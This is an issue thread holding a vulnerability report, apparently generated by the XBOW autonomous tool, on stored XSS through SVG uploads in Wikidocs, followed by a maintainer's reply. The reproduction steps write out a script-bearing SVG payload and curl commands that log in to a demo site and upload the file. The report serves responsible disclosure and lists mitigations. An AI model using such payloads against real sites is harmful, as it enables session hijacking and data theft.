XBOW Security Report - Stored XSS via SVG image at wikidocs

[niemand-sec]

Describe your issue

Disclaimer

This vulnerability was detected using XBOW, a system that autonomously finds and exploits potential security vulnerabilities. The finding has been thoroughly reviewed and validated by a security researcher before submission. While XBOW is intended to work autonomously, during its development human experts ensure the accuracy and relevance of its reports.

Description

A stored Cross-Site Scripting (XSS) vulnerability was identified in the image upload functionality of the application. By uploading a crafted SVG file containing embedded JavaScript, an attacker can execute arbitrary JavaScript in the context of the victim's browser upon viewing the uploaded image.

Mitigations

1. Validate and sanitize uploaded files, ensuring only safe image formats (e.g., PNG, JPEG) are allowed.
2. Remove any embedded scripts in SVG files or disable support for SVG uploads if unnecessary.
3. Implement a Content Security Policy (CSP) to mitigate the risk of script execution.

Impact

• Session Hijacking: Attackers can steal session cookies, allowing them to impersonate legitimate users.
• Data Theft: Access to sensitive information such as personal data, credentials, or financial details.

Device and settings

Wikidocs

Steps to reproduce

1. Create an SVG file (xss.svg) containing malicious JavaScript payload (e.g., alert("XSS")).

cat > xss.svg << 'EOF' 
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg width="100" height="100" version="1.1" xmlns="http://www.w3.org/2000/svg"
xmlns:xlink="http://www.w3.org/1999/xlink">
  <script>
    alert("XSS");
  </script>
</svg>
EOF

2. Get a valid session:

curl -X POST "https://demo.wikidocs.it/submit.php?act=authentication" \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d "document=aa" \
  -d "password=demo" \
  -c cookies.txt \
  -b cookies.txt

3. Upload the crafted SVG using the https://demo.wikidocs.it/submit.php?act=image_upload_ajax endpoint with the following request:

   curl -X POST 'https://demo.wikidocs.it/submit.php?act=image_upload_ajax' \ 
   -H 'Content-Type: multipart/form-data' \
   -F 'document=homepage' \
   -F '[email protected]' \
   -b cookies.txt
   

4. The file location is returned on the JSON response:

{"error":null,"code":"image_uploaded","name":"xss.svg","path":"\/datasets\/documents\/homepage\/xss.svg","size":309}

5. Upon accessing the uploaded file, the JavaScript payload is executed in the user's browser.

Screenshots (optional)

No response

Extra fields

• I'd like to work on this issue

[ffiesta]

Hi to all, i know we need to protect wikidocs with some security, ... but in my head wikidocs is like a personal library, wiki faq ... and only has 2 password (1 to read and another to write) normally user only share the read password or don't.

If this is a personal wiki system i think we need to protect very well writing password!

I don't say that we won't protect jpg or javascript or php, ... but @niemand-sec, can you show any security issues in wikidocs without use write password?

• Its more important solve security issues that won't need write password.